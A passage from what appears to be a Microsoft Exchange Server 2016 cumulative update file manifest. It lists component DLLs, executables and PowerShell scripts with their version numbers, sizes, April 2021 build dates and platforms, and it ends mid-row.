\nMicrosoft.exchange.security.dll| 15.1.2242.5| 1,555,840| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.1.2242.5| 19,840| 04-Apr-2021| 09:14| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.1.2242.5| 28,536| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.1.2242.5| 222,616| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.1.2242.5| 1,110,920| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.1.2242.5| 212,352| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.1.2242.5| 113,560| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.1.2242.5| 82,840| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.1.2242.5| 80,784| 04-Apr-2021| 09:12| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.1.2242.5| 66,456| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.1.2242.5| 81,280| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.1.2242.5| 208,264| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.1.2242.5| 1,163,144| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.1.2242.5| 504,192| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.1.2242.5| 47,496| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.1.2242.5| 848,256| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.1.2242.5| 1,219,992| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.1.2242.5| 30,608| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.1.2242.5| 120,704| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.1.2242.5| 1,009,552| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.1.2242.5| 111,000| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.1.2242.5| 34,696| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.1.2242.5| 19,328| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.1.2242.5| 14,720| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.servicehost.exe| 15.1.2242.8| 60,808| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.1.2242.5| 50,584| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.1.2242.5| 14,200| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.1.2242.5| 14,232| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.services.common.dll| 15.1.2242.8| 74,112| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.services.dll| 15.1.2242.8| 8,477,080| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.1.2242.5| 30,088| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.1.2242.8| 633,752| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.1.2242.8| 1,651,096| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.services.json.dll| 15.1.2242.8| 296,336| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.services.messaging.dll| 15.1.2242.8| 43,400| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.1.2242.5| 233,344| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.services.surface.dll| 15.1.2242.8| 178,560| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.services.wcf.dll| 15.1.2242.8| 348,552| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.1.2242.5| 56,704| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.1.2242.5| 94,584| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.setup.common.dll| 15.1.2242.8| 297,344| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.1.2242.8| 35,736| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.setup.console.dll| 15.1.2242.8| 27,024| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.setup.gui.dll| 15.1.2242.8| 115,072| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.setup.parser.dll| 15.1.2242.8| 54,168| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.1.2242.5| 75,144| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.1.2242.5| 142,728| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.1.2242.5| 24,960| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.1.2242.5| 15,224| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.sharedcache.exe| 15.1.2242.5| 58,752| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.1.2242.5| 27,016| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.1.2242.5| 46,984| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.sqm.dll| 15.1.2242.5| 46,976| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.store.service.exe| 15.1.2242.5| 28,032| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.store.worker.exe| 15.1.2242.5| 26,496| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.1.2242.5| 13,688| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.1.2242.5| 31,632| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.storeprovider.dll| 15.1.2242.5| 1,166,728| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.structuredquery.dll| 15.1.2242.5| 158,600| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.1.2242.8| 628,120| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.1.2242.5| 13,200| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.1.2242.8| 16,264| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.1.2242.5| 13,184| 04-Apr-2021| 09:12| x64 \nMicrosoft.exchange.textprocessing.dll| 15.1.2242.5| 221,576| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.1.2242.5| 13,696| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.1.2242.8| 29,056| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.1.2242.8| 138,648| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.1.2242.5| 21,888| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.1.2242.8| 40,320| 04-Apr-2021| 09:16| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.1.2242.8| 22,912| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.1.2242.8| 21,384| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.1.2242.8| 212,368| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.1.2242.8| 98,688| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.1.2242.8| 22,936| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.1.2242.8| 169,352| 04-Apr-2021| 09:14| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.1.2242.5| 18,304| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.1.2242.5| 20,864| 04-Apr-2021| 09:15| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.1.2242.8| 31,616| 04-Apr-2021| 09:14| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.1.2242.8| 46,976| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.1.2242.8| 30,104| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.1.2242.5| 53,112| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.1.2242.8| 44,936| 04-Apr-2021| 09:14| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.1.2242.5| 18,304| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.1.2242.8| 46,464| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.1.2242.8| 46,472| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.1.2242.5| 28,048| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.common.dll| 15.1.2242.5| 457,096| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.1.2242.5| 18,304| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.1.2242.5| 30,616| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.dll| 15.1.2242.8| 4,181,912| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.1.2242.5| 182,168| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.1.2242.5| 121,736| 04-Apr-2021| 09:12| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.1.2242.5| 403,320| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.1.2242.5| 14,712| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.1.2242.5| 86,936| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.logging.dll| 15.1.2242.5| 88,968| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.1.2242.5| 68,488| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.1.2242.5| 63,352| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.1.2242.8| 430,464| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.net.dll| 15.1.2242.5| 122,232| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.1.2242.5| 17,792| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.1.2242.5| 29,048| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.1.2242.5| 60,808| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.1.2242.5| 50,056| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.1.2242.5| 33,176| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.1.2242.5| 113,048| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.1.2242.5| 18,328| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.1.2242.5| 52,104| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.transport.storage.dll| 15.1.2242.5| 675,192| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.1.2242.8| 21,896| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.1.2242.8| 17,784| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.1.2242.8| 487,304| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.1.2242.5| 12,680| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.1.2242.8| 306,072| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.1.2242.5| 15,752| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.1.2242.8| 46,464| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.1.2242.8| 1,044,376| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.1.2242.5| 15,232| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.1.2242.5| 18,816| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.1.2242.8| 18,824| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.um.callrouter.exe| 15.1.2242.8| 22,408| 04-Apr-2021| 09:14| x86 \nMicrosoft.exchange.um.clientstrings.dll| 15.1.2242.5| 60,288| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.um.grammars.dll| 15.1.2242.5| 211,856| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.um.lad.dll| 15.1.2242.5| 120,704| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.um.prompts.dll| 15.1.2242.5| 214,920| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.1.2242.5| 118,664| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.um.ucmaplatform.dll| 15.1.2242.8| 239,488| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.1.2242.8| 925,064| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.um.umcore.dll| 15.1.2242.8| 1,471,880| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.1.2242.5| 32,656| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.1.2242.5| 41,856| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.1.2242.5| 24,976| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.unifiedmessaging.eventlog.dll| 15.1.2242.5| 130,456| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.1.2242.5| 15,240| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.1.2242.8| 83,336| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.1.2242.8| 50,048| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.1.2242.5| 642,432| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.1.2242.5| 186,264| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.1.2242.5| 67,480| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.1.2242.5| 12,696| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.1.2242.5| 56,720| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.1.2242.5| 27,544| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.1.2242.5| 120,720| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.1.2242.5| 31,640| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.1.2242.5| 57,240| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.1.2242.5| 35,720| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.webservices.dll| 15.1.2242.5| 1,054,088| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.1.2242.5| 67,960| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.1.2242.8| 23,448| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.wopiclient.dll| 15.1.2242.5| 77,192| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.1.2242.5| 17,272| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.1.2242.5| 29,080| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.1.2242.5| 505,232| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.1.2242.5| 14,720| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.1.2242.5| 36,752| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.1.2242.5| 66,432| 04-Apr-2021| 09:11| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.1.2242.5| 19,336| 04-Apr-2021| 09:12| x86 \nMicrosoft.filtering.dll| 15.1.2242.5| 113,024| 04-Apr-2021| 09:11| x86 \nMicrosoft.filtering.exchange.dll| 15.1.2242.8| 57,224| 04-Apr-2021| 09:11| x86 \nMicrosoft.filtering.interop.dll| 15.1.2242.5| 15,240| 04-Apr-2021| 09:11| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.1.2242.5| 46,976| 04-Apr-2021| 09:11| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.1.2242.5| 15,744| 04-Apr-2021| 09:11| x64 \nMicrosoft.forefront.filtering.common.dll| 15.1.2242.5| 23,944| 04-Apr-2021| 09:11| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.1.2242.5| 22,408| 04-Apr-2021| 09:11| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.1.2242.5| 34,680| 04-Apr-2021| 09:11| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,902| 04-Apr-2021| 09:11| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,294| 04-Apr-2021| 09:11| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.1.2242.8| 1,518,456| 04-Apr-2021| 09:11| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.1.2242.5| 13,184| 04-Apr-2021| 09:11| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.1.2242.8| 33,160| 04-Apr-2021| 09:11| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.1.2242.5| 18,304| 04-Apr-2021| 09:12| x86 \nMicrosoft.forefront.reporting.common.dll| 15.1.2242.8| 46,464| 04-Apr-2021| 09:11| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.1.2242.8| 50,560| 04-Apr-2021| 09:12| x86 \nMicrosoft.isam.esent.collections.dll| 15.1.2242.5| 72,576| 04-Apr-2021| 09:11| x86 \nMicrosoft.isam.esent.interop.dll| 15.1.2242.5| 533,912| 04-Apr-2021| 09:11| x86 \nMicrosoft.managementgui.dll| 15.1.2242.5| 133,504| 04-Apr-2021| 09:12| x86 \nMicrosoft.mce.interop.dll| 15.1.2242.5| 24,456| 04-Apr-2021| 09:11| x86 \nMicrosoft.office.audit.dll| 15.1.2242.5| 123,784| 04-Apr-2021| 09:11| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.1.2242.5| 593,288| 04-Apr-2021| 09:11| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.1.2242.5| 42,360| 04-Apr-2021| 09:12| x86 \nMicrosoft.office.compliance.console.core.dll| 15.1.2242.8| 217,976| 04-Apr-2021| 09:12| x86 \nMicrosoft.office.compliance.console.dll| 15.1.2242.8| 854,936| 04-Apr-2021| 09:11| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.1.2242.8| 485,768| 04-Apr-2021| 09:11| x86 \nMicrosoft.office.compliance.core.dll| 15.1.2242.5| 413,072| 04-Apr-2021| 09:11| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.1.2242.5| 36,224| 04-Apr-2021| 09:11| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.1.2242.8| 84,888| 04-Apr-2021| 09:11| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.1.2242.5| 1,782,168| 04-Apr-2021| 09:11| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.1.2242.8| 49,536| 04-Apr-2021| 09:11| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.1.2242.8| 27,536| 04-Apr-2021| 09:11| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.1.2242.5| 174,992| 04-Apr-2021| 09:11| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.1.2242.5| 166,272| 04-Apr-2021| 09:12| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.1.2242.5| 40,328| 04-Apr-2021| 09:11| x86 \nMicrosoft.online.box.shell.dll| 15.1.2242.5| 46,464| 04-Apr-2021| 09:11| x86 \nMicrosoft.powershell.hostingtools.dll| 15.1.2242.5| 67,976| 04-Apr-2021| 09:11| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.1.2242.5| 67,976| 04-Apr-2021| 09:11| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.1.2242.5| 120,192| 04-Apr-2021| 09:12| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,110| 04-Apr-2021| 09:16| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,052| 04-Apr-2021| 09:16| Not applicable \nMovemailbox.ps1| Not applicable| 61,116| 04-Apr-2021| 09:15| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,590| 04-Apr-2021| 09:16| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,520| 04-Apr-2021| 09:15| Not applicable \nMpgearparser.dll| 15.1.2242.5| 99,736| 04-Apr-2021| 09:11| x64 \nMsclassificationadapter.dll| 15.1.2242.5| 248,704| 04-Apr-2021| 09:12| x64 \nMsexchangecompliance.exe| 15.1.2242.8| 78,744| 04-Apr-2021| 09:12| x86 \nMsexchangedagmgmt.exe| 15.1.2242.8| 25,480| 04-Apr-2021| 09:11| x86 \nMsexchangedelivery.exe| 15.1.2242.8| 38,776| 04-Apr-2021| 09:12| x86 \nMsexchangefrontendtransport.exe| 15.1.2242.8| 31,640| 04-Apr-2021| 09:11| x86 \nMsexchangehmhost.exe| 15.1.2242.8| 27,016| 04-Apr-2021| 09:12| x86 \nMsexchangehmrecovery.exe| 15.1.2242.5| 29,560| 04-Apr-2021| 09:11| x86 \nMsexchangemailboxassistants.exe| 15.1.2242.8| 72,584| 04-Apr-2021| 09:11| x86 \nMsexchangemailboxreplication.exe| 15.1.2242.8| 20,872| 04-Apr-2021| 09:11| x86 \nMsexchangemigrationworkflow.exe| 15.1.2242.8| 69,000| 04-Apr-2021| 09:11| x86 \nMsexchangerepl.exe| 15.1.2242.8| 71,064| 04-Apr-2021| 09:11| x86 \nMsexchangesubmission.exe| 15.1.2242.8| 123,288| 04-Apr-2021| 09:11| x86 \nMsexchangethrottling.exe| 15.1.2242.5| 39,808| 04-Apr-2021| 09:11| x86 \nMsexchangetransport.exe| 15.1.2242.5| 74,120| 04-Apr-2021| 09:11| x86 \nMsexchangetransportlogsearch.exe| 15.1.2242.8| 139,160| 04-Apr-2021| 09:11| x86 \nMsexchangewatchdog.exe| 15.1.2242.5| 55,672| 04-Apr-2021| 09:11| x64 \nMspatchlinterop.dll| 15.1.2242.5| 53,640| 04-Apr-2021| 09:11| x64 \nNativehttpproxy.dll| 15.1.2242.5| 91,520| 04-Apr-2021| 09:14| x64 \nNavigatorparser.dll| 15.1.2242.5| 636,824| 04-Apr-2021| 09:11| x64 \nNego2nativeinterface.dll| 15.1.2242.5| 19,344| 04-Apr-2021| 09:11| x64 \nNegotiateclientcertificatemodule.dll| 15.1.2242.5| 30,088| 04-Apr-2021| 09:11| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 22,252| 04-Apr-2021| 09:16| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,567| 04-Apr-2021| 09:16| Not applicable \nNtspxgen.dll| 15.1.2242.5| 80,760| 04-Apr-2021| 09:13| x64 \nOleconverter.exe| 15.1.2242.5| 173,944| 04-Apr-2021| 09:11| x64 \nOutsideinmodule.dll| 15.1.2242.5| 87,928| 04-Apr-2021| 09:11| x64 \nOwaauth.dll| 15.1.2242.5| 92,032| 04-Apr-2021| 09:12| x64 \nOwasmime.msi| Not applicable| 716,800| 04-Apr-2021| 09:15| Not applicable \nPerf_common_extrace.dll| 15.1.2242.5| 245,128| 04-Apr-2021| 09:11| x64 \nPerf_exchmem.dll| 15.1.2242.5| 85,880| 04-Apr-2021| 09:11| x64 \nPipeline2.dll| 15.1.2242.5| 1,454,456| 04-Apr-2021| 09:11| x64 \nPowershell.rbachostingtools.dll_1bf4f3e363ef418781685d1a60da11c1| 15.1.2242.8| 41,360| 04-Apr-2021| 09:11| Not applicable \nPreparemoverequesthosting.ps1| Not applicable| 70,983| 04-Apr-2021| 09:16| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,217| 04-Apr-2021| 09:15| Not applicable \nProductinfo.managed.dll| 15.1.2242.5| 27,016| 04-Apr-2021| 09:11| x86 \nProxybinclientsstringsdll| 15.1.2242.5| 924,536| 04-Apr-2021| 09:12| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,226| 04-Apr-2021| 09:15| Not applicable \nQuietexe.exe| 15.1.2242.5| 14,728| 04-Apr-2021| 09:11| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,540| 04-Apr-2021| 09:11| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,659| 04-Apr-2021| 09:12| Not applicable \nRemoteexchange.ps1| Not applicable| 23,561| 04-Apr-2021| 09:11| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,672| 04-Apr-2021| 09:16| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 14,990| 04-Apr-2021| 09:15| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,000| 04-Apr-2021| 09:15| Not applicable \nReplaycrimsonmsg.dll| 15.1.2242.5| 1,099,128| 04-Apr-2021| 09:11| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,504| 04-Apr-2021| 09:11| Not applicable \nResetcasservice.ps1| Not applicable| 21,695| 04-Apr-2021| 09:15| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,089| 04-Apr-2021| 09:11| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,165| 04-Apr-2021| 09:13| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,238| 04-Apr-2021| 09:11| Not applicable \nRightsmanagementwrapper.dll| 15.1.2242.5| 86,424| 04-Apr-2021| 09:13| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,778| 04-Apr-2021| 09:15| Not applicable \nRpcperf.dll| 15.1.2242.5| 23,424| 04-Apr-2021| 09:11| x64 \nRpcproxyshim.dll| 15.1.2242.5| 39,320| 04-Apr-2021| 09:11| x64 \nRulesauditmsg.dll| 15.1.2242.5| 12,672| 04-Apr-2021| 09:11| x64 \nRwsperfcounters.xml| Not applicable| 23,052| 04-Apr-2021| 09:12| Not applicable \nSafehtmlnativewrapper.dll| 15.1.2242.5| 34,696| 04-Apr-2021| 09:11| x64 \nScanenginetest.exe| 15.1.2242.5| 956,288| 04-Apr-2021| 09:12| x64 \nScanningprocess.exe| 15.1.2242.5| 738,696| 04-Apr-2021| 09:11| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,800| 04-Apr-2021| 09:16| Not applicable \nServicecontrol.ps1| Not applicable| 52,353| 04-Apr-2021| 09:12| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,742| 04-Apr-2021| 09:15| Not applicable \nSettingsadapter.dll| 15.1.2242.5| 116,096| 04-Apr-2021| 09:12| x64 \nSetup.exe| 15.1.2242.5| 20,872| 04-Apr-2021| 09:11| x86 \nSetupui.exe| 15.1.2242.8| 